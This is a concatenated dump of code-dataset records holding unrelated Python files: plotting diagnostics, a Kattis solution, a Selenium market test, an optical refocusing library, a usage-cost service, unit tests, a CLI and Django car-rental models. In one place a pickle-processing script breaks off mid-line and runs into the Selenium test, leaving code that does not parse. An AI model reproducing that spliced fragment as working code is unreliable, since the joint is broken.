births_m[0][plottime]-births_max[0][plottime]\nax.errorbar(ind[0:len(plottime)]+11*width/2., births_m[0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\n# add some\nax.set_ylabel('N values',fontsize=18)\nax.set_xlabel('Time',fontsize=18)\nax.set_title(plottitle,fontsize=21)\nax.set_xticks(ind[0:len(plottime)]+2*width)\nax.set_xticklabels( (np.asarray(plottime,dtype='str')),ha='center' )\nax.legend( (rects1[0], rects2[0],rects3[0],rects4[0],rects5[0],rects6[0]), ('N', 'F','M','Breed F','Breed M','Births') )\nax.axis([-0,len(plottime),0,K])\n\n# Plot age N\n# ----------\n\ncolors = ['k','b','r','y','g','m']\ntick = ['k-','b.-','r--','y,','g,-','m-']\nleg = ['0','1','2','3','4','5']\nfigure()\nplot(nthfile,births_m[0],'c-',label='eggs')\nfill_between(nthfile, births_l[0], births_r[0],color = 'c')\nfor i in range(len(N_age_m[0][0])):\n\tplot(nthfile,N_age_m[0][:,i],tick[i],label=leg[i])\n\tfill_between(nthfile, N_age_l[0][:,i], N_age_r[0][:,i],color=colors[i])\n#plot(nthfile,N_l[0],'r.-', ms = 10)\n#plot(nthfile,N_r[0],'r.-', ms = 10)\nxlabel('Time',fontsize=18)\nylabel('Population Age Total',fontsize=18)\ntitle(plottitle,fontsize=21)\naxis([-0.1,gen,0,K])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'N_age.png',dpi=savedpi)\n\n# Plot He Ho\n# ----------------------------------------------------\nfigure()\nplot(nthfile,He_m[0][:,0],'k-',label='He')\nplot(nthfile,Ho_m[0][:,0],'r.',label='Ho')\n#fill_between(nthfile, He_l[0][:,0], He_r[0][:,0],color = 'b')\n#fill_between(nthfile, Ho_l[0][:,0], Ho_r[0][:,0],color = 'r')\nxlabel('Time',fontsize=18)\nylabel('Heterozygosity',fontsize=18)\ntitle(plottitle+' R='+str(round(np.mean(growthrate_m[0]),4)),fontsize=16)\naxis([-0.1,gen,0,1.0])\nlegend(loc=0)\n# Updating fontsize on axes\nfontsize=19\nax = gca()\nfor tick in ax.xaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nfor tick in ax.yaxis.get_major_ticks():\n\ttick.label1.set_fontsize(fontsize)\nsavefig(dir+savename+'H.png',dpi=savedpi)\n\n\n'''\n# Plot all mortality - stacked side by side\n# ------------------------------------------\nind = np.asarray(nthfile) # the x locations for the groups\nwidth = 0.13 # the width of the bars\nfig, ax = plt.subplots()\n\nrects1 = ax.bar(ind[0:len(plottime)], mort_age_m[0][:,0][plottime], width, color='grey', edgecolor='black', hatch=\"/\")\nyminus = mort_age_m[0][:,0][plottime]-mort_age_min[0][:,0][plottime]\nyplus = mort_age_m[0][:,0][plottime]-mort_age_max[0][:,0][plottime]\nax.errorbar(ind[0:len(plottime)]+width/2., mort_age_m[0][:,0][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\nrects2 = ax.bar(ind[0:len(plottime)]+width, mort_age_m[0][:,1][plottime], width, color='grey', edgecolor='black', hatch=\"//\")\nyminus = mort_age_m[0][:,1][plottime]-mort_age_m[0][:,1][plottime]\nyplus = mort_age_m[0][:,1][plottime]-mort_age_m[0][:,1][plottime]\nax.errorbar(ind[0:len(plottime)]+3*width/2., mort_age_m[0][:,1][plottime], yerr=[yminus, yplus],fmt='bo',capthick=2)\n\n# add some\nax.set_ylabel('Mortality',fontsize=18)\nax.set_xlabel('Time',fontsize=18)\nax.set_title(plottitle,fontsize=21)\nax.set_xticks(ind[0:len(plottime)]+2*width)\nax.set_xticklabels( (np.asarray(plottime,dtype='str')),ha='center' )\nax.legend( (rects1[0], rects2[0]), ('Age0', 'Age1') )\nax.axis([-0,len(plottime),0,K])\nsavefig(dir+savename+'Allmortality.png',dpi=savedpi)\n'''\n\nshow()\n\n","sub_path":"src/post_analysis_scripts/diagnostics_v0.py","file_name":"diagnostics_v0.py","file_ext":"py","file_size_in_byte":16720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"195171135","text":"x, y = map(int, input().split())\nprod = 1\ndiv = y // x\nrem = y % x\nfor i in range(x):\n n = div\n if rem > 0:\n n = n + 1\n rem = rem - 1\n prod = prod * (n / 6)\nprint(prod)\n","sub_path":"kattis/utipc19/paintingpips.py","file_name":"paintingpips.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"613979967","text":"import pandas as pd\nimport pickle\nfrom tqdm import tqdm as tqdm\n\nwith open('/nfs/maciej/mcdoi/louvain/estimated_cc+a', 'r', encoding='utf-8') as f:\n estimated = f.readlines()\nestimated = [x.strip() for x in estimated]\n\nfrom multiprocessing import Pool\n\ndef work_sub(string):\n if string.split('_')[-1] == '30':\n with open(string+'/contagion.pickle', 'rb') as f:\n matrix = pickle.load(f)\n with open(string+'/contagion_dict.pickle', 'rb') as f:\n d = pickle.load(f)\n for key, value in d.items():\n for key1, value1 in d.items():\n if valuea.btn.btn-sm > translate > span\")\n time.sleep(7)\n\n ni1 = randInt(3)\n ni2 = randInt(3)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:first-child > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:first-child > input\") \\\n .send_keys(ni1)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:nth-child(2) > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:first-child > td:nth-child(8) .input-group:nth-child(2) > input\").send_keys(\n ni2)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:first-child > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:first-child > input\") \\\n .send_keys(ni1)\n\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:nth-child(2) > input\").clear()\n driver.find_element_by_css_selector(\n \"table.table > tbody > tr:nth-child(2) > td:nth-child(9) .input-group:nth-child(2) > input\") \\\n .send_keys(ni2)\n\n self.click_css(\"div>a.btn.btn-sm.btn-success > translate > span\")\n time.sleep(2)\n\n self.click_css(\".prices_tab .fa-file-o\")\n\n time.sleep(2)\n self.move_to_element(By.CSS_SELECTOR, '.fa-refresh')\n\n self.click_css('.main-nav-tabs .fa-arrow-down')\n time.sleep(2)\n\n if self.assertTrue(driver.page_source.__contains__(ni2), msg='Python cant found offer volume: ' + ni2):\n False\n else:\n print(\"pass - found offer volume: \" + ni2)\n if self.assertTrue(driver.page_source.__contains__(ni1),\n msg='Python cant found offer volume: ' + ni1):\n False\n else:\n print(\"pass - found offer volume: \" + ni1)\n\n\n self.log_out()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"gt_tests/Deals/creating_offers_in_market.py","file_name":"creating_offers_in_market.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"399972276","text":"import multiprocessing as mp\nimport numpy as np\n\nfrom . import pad\n\n__all__ = [\"fft_propagate\", \"refocus\", \"refocus_stack\"]\n\n\n_cpu_count = mp.cpu_count()\n\n\ndef refocus(field, d, nm, res, method=\"helmholtz\", num_cpus=1, padding=True):\n \"\"\"Refocus a 1D or 2D field\n\n\n Parameters\n ----------\n field : 1d or 2d array\n 1D or 2D background corrected electric field (Ex/BEx)\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelenth in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n num_cpus : int\n Not implemented. Only one CPU is used.\n padding : bool\n perform padding with linear ramp from edge to average\n to reduce ringing artifacts.\n\n .. versionadded:: 0.1.4\n\n Returns\n -------\n Electric field at `d`.\n \"\"\"\n # FFT of field\n fshape = len(field.shape)\n assert fshape in [1, 2], \"Dimension of `field` must be 1 or 2.\"\n\n func = fft_propagate\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n\n for name in names:\n if name in loc:\n vardict[name] = loc[name]\n\n if padding:\n field = pad.pad_add(field)\n\n vardict[\"fftfield\"] = np.fft.fftn(field)\n\n refoc = func(**vardict)\n\n if padding:\n refoc = pad.pad_rem(refoc)\n\n return refoc\n\n\ndef refocus_stack(fieldstack, d, nm, res, method=\"helmholtz\",\n num_cpus=_cpu_count, copy=True, padding=True):\n \"\"\"Refocus a stack of 1D or 2D fields\n\n\n Parameters\n ----------\n fieldstack : 2d or 3d array\n Stack of 1D or 2D background corrected electric fields (Ex/BEx).\n The first axis iterates through the individual fields.\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelenth in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n num_cpus : str\n Defines the number of CPUs to be used for refocusing.\n copy : bool\n If False, overwrites input stack.\n padding : bool\n Perform padding with linear ramp from edge to average\n to reduce ringing artifacts.\n\n .. versionadded:: 0.1.4\n\n Returns\n -------\n Electric field stack at `d`.\n \"\"\"\n\n func = refocus\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n for name in names:\n if name in loc.keys():\n vardict[name] = loc[name]\n # default keyword arguments\n func_def = func.__defaults__[::-1]\n\n # child processes should only use one cpu\n vardict[\"num_cpus\"] = 1\n vardict[\"padding\"] = padding\n\n M = fieldstack.shape[0]\n stackargs = list()\n\n # Create individual arglists for all fields\n for m in range(M):\n kwarg = vardict.copy()\n kwarg[\"field\"] = fieldstack[m]\n # now we turn the kwarg into an arglist\n args = list()\n for i, a in enumerate(names[::-1]):\n # first set default\n if i < len(func_def):\n val = func_def[i]\n if a in kwarg:\n val = kwarg[a]\n args.append(val)\n stackargs.append(args[::-1])\n\n p = mp.Pool(num_cpus)\n result = p.map_async(_refocus_wrapper, stackargs).get()\n p.close()\n p.terminate()\n p.join()\n\n if copy:\n data = np.zeros(fieldstack.shape, dtype=result[0].dtype)\n else:\n data = fieldstack\n\n for m in range(M):\n data[m] = result[m]\n\n return data\n\n\ndef fft_propagate(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagates a 1D or 2D Fourier transformed field\n\n\n Parameters\n ----------\n fftfield : 1-dimensional or 2-dimensional ndarray\n Fourier transform of 1D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n fshape = len(fftfield.shape)\n assert fshape in [1, 2], \"Dimension of `fftfield` must be 1 or 2.\"\n\n if fshape == 1:\n func = fft_propagate_2d\n else:\n func = fft_propagate_3d\n\n names = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n loc = locals()\n vardict = dict()\n for name in names:\n vardict[name] = loc[name]\n\n return func(**vardict)\n\n\ndef fft_propagate_2d(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagate a 1D Fourier transformed field in 2D\n\n\n Parameters\n ----------\n fftfield : 1d array\n Fourier transform of 1D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n assert len(fftfield.shape) == 1, \"Dimension of `fftfield` must be 1.\"\n km = (2 * np.pi * nm) / res\n kx = np.fft.fftfreq(len(fftfield)) * 2 * np.pi\n\n # free space propagator is\n if method == \"helmholtz\":\n # exp(i*sqrt(km²-kx²)*d)\n # Also subtract incoming plane wave. We are only considering\n # the scattered field here.\n root_km = km**2 - kx**2\n rt0 = (root_km > 0)\n # multiply by rt0 (filter in Fourier space)\n fstemp = np.exp(1j * (np.sqrt(root_km * rt0) - km) * d) * rt0\n elif method == \"fresnel\":\n # exp(i*d*(km-kx²/(2*km))\n # fstemp = np.exp(-1j * d * (kx**2/(2*km)))\n fstemp = np.exp(-1j * d * (kx**2/(2*km)))\n else:\n raise ValueError(\"Unknown method: {}\".format(method))\n\n if ret_fft:\n return fftfield * fstemp\n else:\n return np.fft.ifft(fftfield * fstemp)\n\n\ndef fft_propagate_3d(fftfield, d, nm, res, method=\"helmholtz\",\n ret_fft=False):\n \"\"\"Propagate a 2D Fourier transformed field in 3D\n\n\n Parameters\n ----------\n fftfield : 2d array\n Fourier transform of 2D Electric field component\n d : float\n Distance to be propagated in pixels (negative for backwards)\n nm : float\n Refractive index of medium\n res : float\n Wavelength in pixels\n method : str\n Defines the method of propagation;\n one of\n\n - \"helmholtz\" : the optical transfer function `exp(idkₘ(M-1))`\n - \"fresnel\" : paraxial approximation `exp(idk²/kₘ)`\n\n ret_fft : bool\n Do not perform an inverse Fourier transform and return the field\n in Fourier space.\n\n\n Returns\n -------\n Electric field at `d`. If `ret_fft` is True, then the\n Fourier transform of the electric field will be returned (faster).\n \"\"\"\n assert len(fftfield.shape) == 2, \"Dimension of `fftfield` must be 2.\"\n # if fftfield.shape[0] != fftfield.shape[1]:\n # raise NotImplementedError(\"Field must be square shaped.\")\n # free space propagator is\n # exp(i*sqrt(km**2-kx**2-ky**2)*d)\n km = (2 * np.pi * nm) / res\n kx = (np.fft.fftfreq(fftfield.shape[0]) * 2 * np.pi).reshape(-1, 1)\n ky = (np.fft.fftfreq(fftfield.shape[1]) * 2 * np.pi).reshape(1, -1)\n if method == \"helmholtz\":\n # exp(i*sqrt(km²-kx²-ky²)*d)\n root_km = km**2 - kx**2 - ky**2\n rt0 = (root_km > 0)\n # multiply by rt0 (filter in Fourier space)\n fstemp = np.exp(1j * (np.sqrt(root_km * rt0) - km) * d) * rt0\n elif method == \"fresnel\":\n # exp(i*d*(km-(kx²+ky²)/(2*km))\n # fstemp = np.exp(-1j * d * (kx**2+ky**2)/(2*km))\n fstemp = np.exp(-1j * d * (kx**2 + ky**2)/(2*km))\n else:\n raise ValueError(\"Unknown method: {}\".format(method))\n # fstemp[np.where(np.isnan(fstemp))] = 0\n # Also subtract incoming plane wave. We are only considering\n # the scattered field here.\n if ret_fft:\n return fftfield * fstemp\n else:\n return np.fft.ifft2(fftfield * fstemp)\n\n\ndef _refocus_wrapper(args):\n \"\"\"Just calls autofocus with *args. Needed for multiprocessing pool.\n \"\"\"\n return refocus(*args)\n","sub_path":"nrefocus/_propagate.py","file_name":"_propagate.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"40876664","text":"from dataclasses import dataclass\nfrom repository.openai_model_repository import OpenAIModel\nfrom services.openai_model_service import OpenAIModelService\nfrom repository.chatgpt_usage_repository import ChatGptUsageRepository\nfrom utils.timestamp import timestamp\n\n@dataclass\nclass UserUsage:\n user_name: str\n model_id: int\n prompt_tokens: int\n completion_tokens: int\n cost: float\n\n@dataclass\nclass ModelReport:\n model: OpenAIModel\n usages: list[UserUsage]\n prompt_tokens: int\n completion_tokens: int\n cost: float\n\nclass ChatGptUsageService:\n\n def __init__(self, repo: ChatGptUsageRepository, openai_model_service: OpenAIModelService) -> None:\n self._repo = repo\n self._openai_model_service = openai_model_service\n\n def get_usages(self) -> list[ModelReport]:\n start = timestamp() - (24 * 60 * 60 * 1000) # last 24 hours\n usages = self._repo.get_usages(start)\n\n models = self._openai_model_service.get_all()\n model_dict = {m.id:m for m in models}\n\n records: list[UserUsage] = []\n\n for (user_name, model_id, prompt, completion) in usages:\n model = model_dict[model_id]\n\n prompt_cost = prompt / model.base_tokens * model.prompt_cost\n completion_cost = completion / model.base_tokens * model.completion_cost\n\n records.append(UserUsage(\n user_name=user_name,\n model_id=model_id,\n prompt_tokens=prompt,\n completion_tokens=completion,\n cost=prompt_cost + completion_cost\n ))\n\n records.sort(key=lambda u: u.cost, reverse=True)\n\n model_ids = set(x.model_id for x in records)\n groups = [[r for r in records if r.model_id == model_id] for model_id in model_ids]\n\n reports: list[ModelReport] = []\n\n for group in groups:\n model = model_dict[group[0].model_id]\n prompt_tokens = sum((u.completion_tokens for u in group))\n completion_tokens = sum((u.completion_tokens for u in group))\n cost = sum((u.cost for u in group))\n\n report = ModelReport(\n model=model,\n usages=group,\n prompt_tokens=prompt_tokens,\n completion_tokens=completion_tokens,\n cost=cost,\n )\n\n reports.append(report)\n\n reports.sort(key=lambda r: r.cost, reverse=True)\n\n return reports\n\n def get_billed_usages(self):\n return self._repo.get_billed_usages()\n\n def get_billed_usage_by_id(self, billing_id: int) -> int:\n return self._repo.get_billed_usage_by_id(billing_id)","sub_path":"hub/services/chatgpt_usage_service.py","file_name":"chatgpt_usage_service.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"302809292","text":"import pytest\n\nfrom polydatum import DataManager, Service\nfrom polydatum.context import DataAccessContext\n\n\ndef test_meta():\n \"\"\"\n Verify that meta can be given and retrieved from a context\n \"\"\"\n\n class TestService(Service):\n def get_user(self):\n return self._ctx.meta.user\n\n user = object()\n\n dm = DataManager()\n dm.register_services(test=TestService())\n\n with dm.context(meta={\"user\": user}) as ctx:\n assert ctx.dal.test.get_user() is user\n\n # Verify meta can not change\n with dm.context(meta={\"user\": user}) as ctx:\n with pytest.raises(AttributeError):\n ctx.meta.user = \"foo\"\n assert ctx.dal.test.get_user() is user\n\n\ndef test_unique_context():\n \"\"\"\n Ensure that we get a new context on each DAL enter.\n \"\"\"\n data_manager = DataManager()\n with data_manager.dal():\n context1 = data_manager.get_active_context()\n\n with data_manager.dal():\n context2 = data_manager.get_active_context()\n\n assert context1 != context2\n\n\ndef test_service_context():\n \"\"\"\n Verify that if you access a Service's context when no\n context is active, you get a RuntimeError.\n \"\"\"\n\n class TestService(Service):\n def get_context(self):\n return self._ctx\n\n data_manager = DataManager()\n data_manager.register_services(test=TestService())\n\n with data_manager.dal() as dal:\n ctx = dal.test.get_context()\n get_context = dal.test.get_context\n\n assert isinstance(ctx, DataAccessContext)\n\n with pytest.raises(RuntimeError):\n get_context()\n\n\ndef test_require_active_context():\n \"\"\"\n Verify require_active_context raises an exception when there is no context\n or returns the context when there is one.\n \"\"\"\n data_manager = DataManager()\n with pytest.raises(RuntimeError):\n data_manager.require_active_context()\n\n with data_manager.context() as ctx:\n assert data_manager.require_active_context() is ctx\n","sub_path":"tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212680576","text":"from __future__ import division, absolute_import, print_function\n\nimport argparse\nimport os\nimport glob\nfrom gp_align.analyse import analyse_run\n\nparser = argparse.ArgumentParser(description=\"Analyse growth profiler images\")\nparser.set_defaults(func=lambda args: parser.print_help())\n\nsubparsers = parser.add_subparsers()\n\n\ndef analyse_images(args):\n filenames = []\n for f in args.infiles:\n if \"*\" in f:\n filenames.extend(glob.glob(f))\n else:\n filenames.append(f)\n\n for filename in filenames:\n if not os.path.isfile(filename):\n raise ValueError(filename, \"does not exist\")\n\n outname = args.out\n\n if args.scanner == 1:\n plate_names = None\n elif args.scanner == 2:\n plate_names = [\"tray7\", \"tray8\", \"tray9\", \"tray10\", \"tray11\", \"tray12\"]\n\n plate_type = args.plate_type\n orientation = args.orientation\n\n data = analyse_run(filenames, plate_type, orientation=orientation, plate_names=plate_names)\n\n for name, df in data.items():\n df.to_csv(outname + \"_\" + name + \".G.tsv\", sep=\"\\t\")\n\n\nanalyse_parser = subparsers.add_parser(\n \"analyse\", help=\"Analyse a list of growth profiler images and output a tsv file with growth curves\"\n)\nanalyse_parser.add_argument(\"infiles\", type=str, nargs=\"+\")\nanalyse_parser.add_argument(\"--out\", type=str, default=\"result\")\nanalyse_parser.add_argument(\"--orientation\", type=str, default=\"top_right\", choices=[\"top_right\", \"bottom_left\"])\nanalyse_parser.add_argument(\"--plate_type\", type=int, default=1)\nanalyse_parser.add_argument(\"--scanner\", type=int, default=1, choices=[1, 2])\nanalyse_parser.set_defaults(func=analyse_images)\n\n\ndef convert_g_values(args):\n import numpy as np\n import pandas as pd\n\n def convert_G_to_OD(val, A, B, C):\n return np.exp((val - C) / A) - B\n\n parameters = args.parameters\n inputs = args.files\n\n parameters = list(map(float, parameters))\n print(parameters)\n\n filenames = []\n for f in inputs:\n if \"*\" in f:\n filenames.extend(glob.glob(f))\n else:\n filenames.append(f)\n\n for filename in filenames:\n if not os.path.isfile(filename):\n raise ValueError(filename, \"does not exist\")\n if not filename.endswith(\".G.tsv\"):\n raise ValueError(filename, \"does not end with .G.tsv\")\n\n for filename in filenames:\n df = pd.read_csv(filename, sep=\"\\t\", index_col=0)\n\n converted_df = convert_G_to_OD(df, *parameters)\n converted_df.index = converted_df.index / 60\n\n outname = filename[:-5] + \"OD.v2.tsv\"\n converted_df.to_csv(outname, sep=\"\\t\")\n\nconvert_parser = subparsers.add_parser(\n \"convert\", help=\"Convert the output G-value files to OD-values, using a set of calibration parameters.\"\n)\nconvert_parser.add_argument(\"parameters\", type=str, nargs=3)\nconvert_parser.add_argument(\"files\", type=str, nargs=\"+\")\nconvert_parser.set_defaults(func=convert_g_values)","sub_path":"gp_align/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614564085","text":"# coding=utf-8\n# Copyright (C) 2020 NumS Development Team.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n\nimport numpy as np\n\nfrom nums.core.systems import numpy_compute\nfrom nums.core.systems.systems import System, RaySystem\nfrom nums.core.systems.filesystem import FileSystem\nfrom nums.core.systems.schedulers import RayScheduler, BlockCyclicScheduler\nfrom nums.core.array.application import ArrayApplication, BlockArray\n\n\ndef check_block_integrity(arr: BlockArray):\n for grid_entry in arr.grid.get_entry_iterator():\n assert arr.blocks[grid_entry].grid_entry == grid_entry\n assert arr.blocks[grid_entry].rect == arr.grid.get_slice_tuples(grid_entry)\n assert arr.blocks[grid_entry].shape == arr.grid.get_block_shape(grid_entry)\n\n\nclass MockMultiNodeScheduler(BlockCyclicScheduler):\n # pylint: disable=abstract-method, bad-super-call\n\n def init(self):\n # Intentionally calling init of grandparent class.\n super(BlockCyclicScheduler, self).init()\n # Replicate available nodes to satisfy cluster requirements.\n assert len(self.available_nodes) == 1\n\n self.available_nodes = self.available_nodes * np.prod(self.cluster_shape)\n for i, cluster_entry in enumerate(self.get_cluster_entry_iterator()):\n self.cluster_grid[cluster_entry] = self.available_nodes[i]\n\n\ndef mock_cluster(cluster_shape):\n scheduler: RayScheduler = MockMultiNodeScheduler(compute_module=numpy_compute,\n cluster_shape=cluster_shape,\n use_head=True)\n system: System = RaySystem(compute_module=numpy_compute,\n scheduler=scheduler)\n system.init()\n return ArrayApplication(system=system, filesystem=FileSystem(system))\n","sub_path":"tests/array/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"525736030","text":"import datetime\nfrom datetime import timedelta\nfrom dateutil.relativedelta import relativedelta\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom djrichtextfield.models import RichTextField\n\nfrom users.models import User\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\n\n# Create your models here.\nfrom django_countries.fields import CountryField\nfrom djmoney.models.fields import MoneyField\n\n\nclass Car(models.Model):\n TRANSMISSIONS = [\n ('Manual', 'Manual'),\n ('Automatic', 'Automatic')\n ]\n FUELS = [\n ('Gasoline', 'Gasoline'),\n ('Diesel', 'Diesel'),\n ('Liquefied Petroleum', 'Liquefied Petroleum'),\n ('Compressed Natural Gas', 'Compressed Natural Gas'),\n ('Ethanol', 'Ethanol'),\n ('Bio-diesel', 'Bio-diesel')\n ]\n PRICE_VARIATIONS = [\n ('Month', 'Month')\n ]\n owner = models.ForeignKey(User, on_delete=models.CASCADE, blank=False, null=False)\n name = models.CharField(max_length=255, blank=False, null=False)\n brand = models.ForeignKey('Brand', on_delete=models.SET_NULL, blank=False, null=True)\n model_no = models.CharField(max_length=50, blank=False, null=False)\n model_year = models.PositiveIntegerField(\n validators=[MinValueValidator(1984), MaxValueValidator(datetime.date.today().year)], blank=False)\n license_no = models.CharField(max_length=100, null=True, blank=True)\n tracking_id = models.CharField(max_length=100, null=True, blank=True)\n mileage = models.PositiveIntegerField(default=0, blank=False, null=False)\n transmission = models.CharField(max_length=20, choices=TRANSMISSIONS, blank=False, null=False)\n seats = models.PositiveIntegerField(default=0, blank=False, null=False)\n luggage = models.PositiveIntegerField(default=0, blank=False, null=False)\n fuels = models.ManyToManyField('Fuel', blank=True)\n description = models.TextField(blank=True, null=True)\n rental_price = MoneyField(max_digits=14, decimal_places=2, default=0.00, default_currency='USD', blank=False,\n null=False)\n price_variable = models.CharField(max_length=20, choices=PRICE_VARIATIONS, default='Month', blank=False, null=False)\n features = models.ManyToManyField('Feature', blank=True)\n is_published = models.BooleanField(default=True)\n is_featured = models.BooleanField(default=False)\n is_active = models.BooleanField(default=True)\n image = models.ImageField(upload_to='rental_exchange/car_images', null=True, blank=True)\n fitness_test = models.CharField(max_length=20, choices=[('Pass', 'Pass'), ('Fail', 'Fail')], null=True, blank=True)\n agreement_paper = models.FileField(upload_to='rental_exchange/agreement_papers/', null=True, blank=True)\n tags = models.CharField(max_length=512, blank=True, null=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = \"cars\"\n verbose_name_plural = \"Cars\".upper()\n ordering = (\"created_at\",)\n unique_together = ('name', 'model_no', 'model_year')\n\n def get_absolute_url(self):\n # return f\"car/{self.id}/\"\n return reverse('car-detail', args=[self.id])\n\n def is_booked(self):\n bookings = CarBooking.objects.filter(car=self.id, rent_status='On Going')\n return bookings.exists()\n\n\nclass Brand(models.Model):\n name = models.CharField(max_length=50, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n logo = models.ImageField(upload_to='rental_exchange/brand_images', null=True, blank=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = \"brands\"\n verbose_name_plural = \"Brands\".upper()\n ordering = (\"name\",)\n\n\nclass Feature(models.Model):\n title = models.CharField(max_length=255, unique=True, blank=False, null=False)\n description = models.TextField(blank=True, null=True)\n created_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n updated_by = models.ForeignKey(User, on_delete=models.SET_NULL, blank=True, null=True, related_name=\"+\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n db_table = \"features\"\n verbose_name_plural = \"Features\".upper()\n ordering = (\"title\",)\n\n\nclass Fuel(models.Model):\n 